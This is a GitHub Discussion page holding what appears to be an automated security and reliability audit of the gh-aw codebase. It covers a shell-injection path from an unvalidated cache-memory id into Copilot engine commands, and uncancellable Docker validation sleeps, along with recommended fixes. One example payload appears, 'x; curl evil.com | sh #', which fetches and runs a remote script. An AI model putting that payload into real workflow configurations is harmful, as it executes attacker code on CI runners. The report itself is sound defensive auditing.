[sergo] Sergo Report: cache-id-second-propagation-plus-docker-context-audit - 2026-03-22 #22326
Closed
Replies: 1 comment
-
|
This discussion was automatically closed because it expired on 2026-03-23T22:21:19.833Z.
|
Beta Was this translation helpful? Give feedback.
0 replies
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
Uh oh!
There was an error while loading. Please reload this page.
-
Overview
Today's run extends the cache.ID injection findings from run 28 into a new propagation path through
copilot_engine_execution.go, and introduces a fresh audit of uncancellable blocking indocker_validation.go. The cache.ID issue proves to have wider blast radius than originally documented: the same unvalidated identifier that injects intocache.go:367also flows into two additional injection points in the Copilot engine execution code path. The Docker validation finding is entirely new territory — thevalidateDockerImagefunction lacks acontext.Contextparameter entirely, causinggh aw compileto potentially block up to 35+ seconds without responding to Ctrl+C.Three improvement tasks are generated, covering the cache.ID injection second propagation vector (CRITICAL), the Docker validation context gap (HIGH), and a low-severity cancellable-sleep inconsistency.
Serena Tools Snapshot
activate_project,check_onboarding_performed,list_dir,grep,bash,read_fileStrategy Selection
Cached Reuse Component (50%): Extending
cache-id-injectionfrom Run 28cache-id-injection-plus-mcp-setup-revisit(run 28, score 8/10)cache.IDinjected intomkdir -pincache.go:367and YAML key/value fields ingenerateCacheSteps. Root cause wasparseCacheMemoryEntryhaving zero validation on theidfield. The hypothesis was that the samecache.IDlikely propagates further into other subsystems — specifically the Copilot engine execution path which also readsCacheMemoryConfig.Caches.cache.ID → cacheDirpropagation throughcopilot_engine_execution.gorather than staying incache.go.New Exploration Component (50%): Docker Validation Context Audit
time.Sleepcall sites in non-test production code for missing context cancellation, focusing on functions that lackcontext.Contextparameters entirely.grepfortime.Sleeppatterns,read_fileto inspect function signatures and surrounding code.docker_validation.gowas an unexplored file.pkg/workflow/docker_validation.go,pkg/cli/run_workflow_execution.go,pkg/cli/trial_repository.goCombined Strategy Rationale
The cached component deepened an already-confirmed CRITICAL vulnerability by mapping its full call graph, adding concrete evidence of wider impact. The new component discovered a distinct class of usability/reliability bug (uninterruptible blocking) that complements the security-focused injection findings. Together they provide both depth (critical issue propagation) and breadth (new problem class).
Codebase Context
pkg/workflow(primary),pkg/cli(secondary)copilot_engine_execution.go,docker_validation.go,cache.go,run_workflow_execution.goFindings Summary
Detailed Findings
Critical: cache.ID Injection Propagates into Copilot Engine Execution
File:
pkg/workflow/copilot_engine_execution.gocache.ID(from user YAML frontmatter, fieldcache-memory[*].id) flows through a second injection path entirely separate fromcache.go:367found in run 28.The propagation chain:
The
mkdirCommandsstring is then embedded directly in the compiled GitHub Actions YAMLrun:block atcopilot_engine_execution.go:207. Acache-memoryentry withid: "x; curl evil.com | sh #"would inject and execute arbitrary shell commands on the CI runner.Severity: CRITICAL — same classification as
cache.go:367from run 28. Same root cause, two additional exploitation surfaces.Locations:
pkg/workflow/copilot_engine_execution.go:104—cacheDirconstructed from unvalidatedcache.IDpkg/workflow/copilot_engine_execution.go:136—mkdir -p <cacheDir>shell injectionpkg/workflow/copilot_engine_execution.go:166—cacheDirin full copilot command stringpkg/workflow/cache.go:47— root cause:parseCacheMemoryEntryno ID validationHigh:
validateDockerImageHas No Context — Blocksgh aw compilefor 35+ SecondsFile:
pkg/workflow/docker_validation.goWith
maxAttempts = 3andwaitTimestarting at 5 seconds doubling each retry, the worst case is:A user who references an invalid but resolvable-looking container image (e.g. a private registry that returns 403 instead of 404) can trigger this code path during
gh aw compile. The function ignores Ctrl+C entirely because neither theexec.Commandnor thetime.Sleeprespond to context cancellation. The function should acceptcontext.Context, useexec.CommandContext, and replace the sleep withselect { case <-time.After(d): case <-ctx.Done(): return ctx.Err() }.Severity: HIGH — blocks the user's terminal with no escape path other than
kill -9.Locations:
pkg/workflow/docker_validation.go:89— function signature missingcontext.Contextpkg/workflow/docker_validation.go:129—exec.Commandwithout contextpkg/workflow/docker_validation.go:168—time.Sleepwithoutselect/ctx.DoneLow Priority: run_workflow_execution.go time.Sleep Missing ctx.Done
File:
pkg/cli/run_workflow_execution.go:567The
runAllWorkflowsclosure correctly checksctx.Done()before triggering each workflow (lines 544–548) but then sleeps for 1 second between workflows without context awareness:If a user presses Ctrl+C immediately after a workflow trigger, the program will be unresponsive for up to 1 second. The fix is to wrap the sleep in a
select:Severity: LOW — maximum delay is 1 second, no user-visible hang in practice.
Improvement Tasks
Task 1: Validate
cache-memoryid Field to Prevent Shell Injection in Copilot EngineIssue Type: Security — Shell Injection
Problem:
parseCacheMemoryEntry(cache.go:47) accepts any string value for theidfield without validation. This value propagates tocopilot_engine_execution.go:104where it is used to constructcacheDir = fmt.Sprintf("/tmp/gh-aw/cache-memory-%s/", cache.ID), which is then injected intomkdir -p <cacheDir>shell commands and the full copilot CLI invocation in the compiled GitHub Actions YAML. A maliciousidvalue with;,&&,$(), or newlines executes arbitrary shell code on CI runners.Locations:
pkg/workflow/cache.go:47— root cause, add ID validationpkg/workflow/copilot_engine_execution.go:104,136,166— secondary propagationImpact:
Recommendation: Add ID validation in
parseCacheMemoryEntryimmediately afterentry.ID = idStrat cache.go:56:This single validation at the parse boundary eliminates all downstream injection surfaces including
cache.go:367,copilot_engine_execution.go:136, andcopilot_engine_execution.go:166.Validation:
isValidCacheIDcovering;,&&,$(),../, newlinesEstimated Effort: Small
Task 2: Add
context.ContexttovalidateDockerImagefor Cancellable CompilationIssue Type: Reliability — Uninterruptible Blocking
Problem:
validateDockerImageindocker_validation.gotakes nocontext.Context. Both thedocker pullsubprocess and the exponential-backoff sleep (5s / 10s / 20s) are non-cancellable. Duringgh aw compile, invalid or slow-to-respond container images cause a 35+ second terminal hang with no response to Ctrl+C. The function should propagate context to the subprocess and the retry sleep.Location:
pkg/workflow/docker_validation.go:89Impact:
Recommendation:
Update all callers to pass context. The
isDockerDaemonRunning()cached check at line 65 also usesexec.Commandwithout context — add async.Oncetimeout there too.Validation:
Estimated Effort: Small
Task 3: Make
runAllWorkflowsSleep Cancellable via ContextIssue Type: Reliability — Minor Uninterruptible Sleep
Problem:
run_workflow_execution.go:567usestime.Sleep(1 * time.Second)as an inter-workflow delay without checkingctx.Done(). The context check exists at line 544 before each workflow but is absent around the 1-second delay between them, creating a brief unresponsive window on cancellation.Location:
pkg/cli/run_workflow_execution.go:567Impact:
Recommendation:
Estimated Effort: Trivial
Success Metrics
This Run
Score Reasoning
Historical Context
Strategy Performance
Cumulative Statistics
mcp-scripts-shell-injection-plus-yaml-analysis(score 9)Recommendations
Immediate Actions
cache-memoryidfield inparseCacheMemoryEntry— one-line regex fix eliminates multiple injection surfaces acrosscache.goandcopilot_engine_execution.gocontext.ContexttovalidateDockerImage— prevents 35+ second compile hangstime.Sleepinselect/ctx.Done— consistency improvementLong-term Improvements
The
unfixed_recurring_issueslist now contains 32 entries spanning 29 runs. The most impactful backlog items by re-occurrence count are:GetSupportedEngines/GetEngineByPrefixnon-deterministic map iteration (27 runs)getLatestWorkflowRunWithRetrymissing context (21 runs)io.ReadAllwithoutLimitReaderacross 4+ HTTP client sites (8+ runs each)A dedicated triage sprint targeting the top 5 by severity × recurrence would meaningfully reduce the backlog.
Next Run Preview
Suggested Focus Areas
parseCacheMemoryEntryvalidation is merged, confirm it covers all injection pointsEngineConfig.Argsinjection:copilot_engine_execution.go:118appends user-providedEngineConfig.Argsdirectly tocopilotArgs; trace whether those args can contain--add-dir <shell-injection-path>git_helpers.go runGitWithSpinneranddispatch.go getRepoDefaultBranchremain unfixed context gaps from previous runsStrategy Evolution
Continue the 50%/50% split. The next cached component should pick either the high-score
mcp-scripts-shell-injectionstrategy (score 9, last used run 26) to verify themcp_setup_generator.goheredoc injection is still present, or theEngineConfig.Argsangle above. For new exploration, consider auditingfmt.Fprintfcalls injobs.go(150+ lines of direct YAML emission) for user-controlledjob.Envorjob.Outputskeys without newline sanitization.References:
Beta Was this translation helpful? Give feedback.
All reactions